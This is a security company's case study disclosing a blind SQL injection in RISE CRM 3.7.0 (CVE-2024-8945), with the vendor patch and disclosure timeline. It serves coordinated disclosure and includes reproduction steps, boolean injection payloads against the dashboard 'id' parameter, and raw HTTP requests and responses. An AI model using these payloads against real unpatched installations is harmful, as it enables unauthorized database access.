Bytium®
Security-first
Back to Insights
Bytium • Insight

Blind SQL Injection in RISE CRM (CVE-2024-8945)

Case study detailing the discovery, validation, and remediation of a blind SQL injection vulnerability in RISE CRM version 3.7.0.

By Bytium Operators2 min read

Background

At Bytium, security validation is a standard step before recommending third-party software to clients. When a client considered adopting RISE CRM for customer and project management, we performed a security assessment to evaluate potential risks prior to deployment.

This case study documents the identification of a critical SQL injection vulnerability, our coordination with the vendor, and the resulting remediation.

Vulnerability Summary

Affected version: 3.7.0
Patched version: 3.7.1
CVE: CVE-2024-8945

A blind SQL injection vulnerability was identified that allows authenticated users to manipulate backend database queries through unsanitized input.

Technical Details

Vulnerability type: Blind SQL Injection
Severity: Critical

Vulnerable endpoint: /index.php/dashboard/save
Vulnerable parameter: id

Root cause:

$id = $this->request->getPost("id");

User input from a POST request is assigned directly to a variable without validation or sanitization, allowing crafted SQL payloads to influence backend queries.

Reproduction Steps

  1. Log in to RISE CRM version 3.7.0.
  2. Create a new dashboard.
  3. Intercept the POST request using an intercepting proxy.
  4. Modify the id parameter with the following payloads:
    • Failed payload: -1 OR 1=2-- -
    • Successful payload: -1 OR 1=1-- -
  5. Observe response differences confirming blind SQL injection.

Proof of Exploitation

Successful request:

POST /rise/index.php/dashboard/save HTTP/1.1
id=-1 OR 1=1-- -&data=false&title=SQLI&color=#34495e

Response:

HTTP/1.1 200 OK
{"success":true,"dashboard_id":"-1 OR 1=1-- -","message":"The record has been saved."}

Failed request:

POST /rise/index.php/dashboard/save HTTP/1.1
id=-1 OR 1=2-- -&data=false&title=SQLI&color=#34495e

Response:

HTTP/1.1 302 Found

The response discrepancy confirms blind SQL injection behavior.

Mitigation

The vendor was notified immediately after validation. A patched version (3.7.1) was released following coordination with the development team.

Users should upgrade to the latest version.

Disclosure Timeline

September 3, 2024 – Initial discovery
September 3, 2024 – Vendor notified
September 4, 2024 – Vendor response
September 9, 2024 – Patch released
September 12, 2024 – Public disclosure

Acknowledgment

This vulnerability was discovered by Jobyer Ahmed.